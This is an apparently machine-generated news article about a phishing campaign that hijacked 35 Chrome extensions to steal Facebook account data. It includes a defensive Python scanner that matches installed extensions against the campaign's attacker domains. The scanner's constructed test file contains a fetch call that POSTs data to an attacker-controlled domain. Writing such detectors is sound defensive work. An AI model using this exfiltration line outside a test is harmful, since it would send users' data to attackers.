

Ethical Hacking News

New Details Reveal How Hackers Hijacked 35 Google Chrome Extensions: A Sophisticated Phishing Campaign


New details reveal how hackers hijacked 35 Google Chrome extensions, compromising sensitive user data and highlighting the importance of security awareness among developers and users. Stay informed about the latest cyber threats and learn how to protect yourself with our in-depth coverage.

  • A highly sophisticated phishing campaign targeted Chrome browser extension developers, compromising at least thirty-five extensions.
  • The attack began with phishing emails sent to developers' support addresses, claiming the extension violated Google's policies and steering the developer into granting a malicious OAuth app permission to manage their Chrome Web Store extensions.
  • Malicious code injected into compromised extensions stole Facebook account data, including user IDs, access tokens, and ad account information.
  • Stolen data was exfiltrated to a command and control (C2) server and used for various malicious activities.
  • Experts warn that the actual number of affected extensions may be higher than reported; the indicator domains tied to the campaign were mostly created in November and December 2024.
  • The attack highlights the importance of security awareness and vigilance among developers, users, and organizations.



    In a shocking revelation, new details have emerged about a highly sophisticated phishing campaign that targeted Chrome browser extension developers, leading to the compromise of at least thirty-five extensions. This brazen attack, which began around December 5th, 2024, has left security experts stunned and scrambling to understand the scope and implications of this malicious operation.

    According to reports on LinkedIn and Google Groups from targeted developers, the latest campaign started with a phishing email sent directly or through a support email associated with their domain name. The emails were made to appear as if they came from Google, claiming that the extension was in violation of Chrome Web Store policies and was at risk of being removed.

    "We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images," reads one phishing email. "If you're seeing this message, it means that your extension has been flagged for review."

    The link in the phishing emails led into Google's standard authorization flow, the same flow used to securely grant third-party apps access to specific Google account resources, so nothing on the consent screen looked out of place. The attackers, however, had registered a malicious OAuth application named "Privacy Policy Extension" that asked the victim to grant it permission to manage Chrome Web Store extensions through their account.

    The first reports concerned phishing emails sent from the domains supportchromestore.com, forextensions.com, and chromeforextension.com. However, BleepingComputer had already discovered earlier command and control subdomains in March 2024, indicating that the threat actors had been testing this attack for months before launching their campaign.

    The malicious code injected into the compromised extensions contained two files: 'worker.js' and 'content.js', which were used to steal data from Facebook accounts. The attackers targeted users of the poisoned extensions, specifically those who accessed Facebook business accounts, in an effort to gain access to sensitive information such as user IDs, access tokens, account info, ad account information, and business accounts.

    The stolen information was packaged together with Facebook cookies, the user agent string, Facebook ID, and mouse click events and exfiltrated to the attacker's command and control (C2) server. The threat actors have been using this compromised data to make direct payments from the victim's credit card to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.

    While the number of affected extensions is currently reported at thirty-five, experts warn that the actual number may be significantly higher. IOCs from the attack list a far greater number of attacker domains, most created in November and December 2024, suggesting that more extensions were targeted.
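The three phishing domains and the injected file names above are the kind of indicators a defender can check installed extensions against. The following is an added example, not code from the article or from any vendor it names: it walks unpacked Chrome extension directories, extracts host names from their JS/JSON files, matches them against the indicator domains the article lists, and queues files named worker.js or content.js that reach hosts the manifest never declared for manual review. The on-disk layout Extensions/<id>/<version>/manifest.json and the sample extension it builds are assumptions; the file-name heuristic is a review aid, not proof of compromise.

```python
"""Scan unpacked Chrome extensions for indicators tied to the campaign above.

Added example (not the article's code).  Assumptions: the indicator domains are
the three the article names; installed extensions live under
Extensions/<extension-id>/<version>/manifest.json; the sample extension built
below is constructed for demonstration only.
"""
import json
import os
import re
import tempfile

# Attacker domains named in the article.
IOC_DOMAINS = {"supportchromestore.com", "forextensions.com", "chromeforextension.com"}

# Candidate host names inside JS/JSON text.  The last label must be alphabetic
# so version strings such as 1.0.0 are not picked up.
HOST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})\b", re.IGNORECASE)
# Labels that are file extensions rather than TLDs (worker.js, manifest.json ...).
NOT_TLDS = {"js", "mjs", "json", "html", "css", "png", "svg", "map", "ts"}


def hosts_in_text(text):
    """Return the set of lower-cased host-like strings found in text."""
    return {m.group(1).lower() for m in HOST_RE.finditer(text)
            if m.group(1).rsplit(".", 1)[-1].lower() not in NOT_TLDS}


def _matches(host, domains):
    """True if host equals or is a subdomain of any entry in domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_extension(ext_dir, ioc_domains=IOC_DOMAINS):
    """Scan one unpacked extension directory and return a findings dict."""
    manifest = {}
    manifest_path = os.path.join(ext_dir, "manifest.json")
    if os.path.isfile(manifest_path):
        with open(manifest_path, encoding="utf-8") as fh:
            manifest = json.load(fh)
    # Hosts the extension declares (MV3 host_permissions, MV2 permissions).
    declared = hosts_in_text(json.dumps(manifest.get("host_permissions", [])
                                        + manifest.get("permissions", [])))
    findings = {"name": manifest.get("name", os.path.basename(ext_dir)),
                "version": manifest.get("version", ""),
                "ioc_hits": [], "review": []}
    for root, _dirs, files in os.walk(ext_dir):
        for fn in sorted(files):
            if not fn.endswith((".js", ".mjs", ".html", ".json")):
                continue
            path = os.path.join(root, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = hosts_in_text(fh.read())
            rel = os.path.relpath(path, ext_dir)
            hits = sorted(h for h in hosts if _matches(h, ioc_domains))
            if hits:  # strong signal: a known campaign domain
                findings["ioc_hits"].append((rel, hits))
            # Weak signal: the injected files were named worker.js / content.js
            # and talked to hosts the manifest never declared.  Legitimate
            # extensions can do the same, so this only queues the file for review.
            undeclared = sorted(h for h in hosts if not _matches(h, declared))
            if fn in ("worker.js", "content.js") and undeclared:
                findings["review"].append((rel, undeclared))
    return findings


def scan_profile(extensions_root, ioc_domains=IOC_DOMAINS):
    """Walk Extensions/<id>/<version>/ and return only extensions with findings."""
    results = []
    for ext_id in sorted(os.listdir(extensions_root)):
        id_dir = os.path.join(extensions_root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            ver_dir = os.path.join(id_dir, version)
            if os.path.isfile(os.path.join(ver_dir, "manifest.json")):
                f = scan_extension(ver_dir, ioc_domains)
                if f["ioc_hits"] or f["review"]:
                    f["id"] = ext_id
                    results.append(f)
    return results


def build_sample_extension():
    """Constructed sample: a tiny MV3 extension whose worker.js posts to a
    subdomain of an indicator domain.  Returns (extensions_root, ext_dir)."""
    root = tempfile.mkdtemp()
    ext_dir = os.path.join(root, "abcdefghijklmnopabcdefghijklmnop", "1.0.0")
    os.makedirs(ext_dir)
    manifest = {"manifest_version": 3, "name": "Sample Extension (constructed)",
                "version": "1.0.0", "host_permissions": ["*://*.facebook.com/*"],
                "background": {"service_worker": "worker.js"}}
    with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(ext_dir, "worker.js"), "w", encoding="utf-8") as fh:
        fh.write('// constructed sample, not the real injected code\n'
                 'const C2 = "https://api.supportchromestore.com/collect";\n'
                 'fetch(C2, { method: "POST", body: payload });\n')
    return root, ext_dir


if __name__ == "__main__":
    root, sample = build_sample_extension()
    print(json.dumps(scan_profile(root), indent=2))
    # Real profile on Linux (default path is an assumption):
    # print(scan_profile(os.path.expanduser("~/.config/google-chrome/Default/Extensions")))
```

Point `scan_profile` at a real profile's Extensions directory to sweep a machine; an `ioc_hits` entry is worth immediate removal of the extension, while a `review` entry only means a worker.js or content.js reached a host outside its declared permissions and should be read by a human.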

    In a post-mortem writeup, Cyberhaven explains how one employee followed the standard flow and inadvertently authorized the malicious third-party application without receiving an MFA prompt or having their Google credentials compromised. "The employee had Google Advanced Protection enabled and had MFA covering his account," reads the report. "The employee did not receive an MFA prompt."

    This brazen attack highlights the importance of security awareness and vigilance among developers, users, and organizations. As security experts continue to analyze this sophisticated phishing campaign, they will undoubtedly uncover more details about the motivations behind it and the tactics used by the attackers.

    In the meantime, it is essential for Chrome extension developers to exercise extreme caution when receiving unsolicited emails or notifications from unknown sources, even if they appear to come from Google. The consequences of falling victim to such an attack can be severe, including financial loss, reputational damage, and compromised user data.

    As with any security breach, it is crucial that those affected take immediate action to contain the situation and prevent further compromise. This may involve reporting the incident to Chrome's support team or Google, as well as taking steps to secure their account credentials and protect against future attacks.

    In conclusion, this highly sophisticated phishing campaign serves as a stark reminder of the ever-evolving nature of cyber threats and the need for collective vigilance in protecting our digital assets. As security experts continue to work tirelessly to understand the scope and implications of this attack, we must also remain vigilant and take proactive steps to safeguard ourselves against future threats.



    Related Information:

  • https://www.bleepingcomputer.com/news/security/new-details-reveal-how-hackers-hijacked-35-google-chrome-extensions/

  • https://www.theverge.com/2024/12/28/24330758/chrome-extension-cyberhaven-hijack-phishing-cyberattack-facebook-ads-authentication-theft

  • https://www.tomsguide.com/computing/online-security/over-600-000-chrome-users-at-risk-after-16-browser-extensions-compromised-by-hackers-what-you-need-to-know


  • Published: Tue Dec 31 13:05:45 2024 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.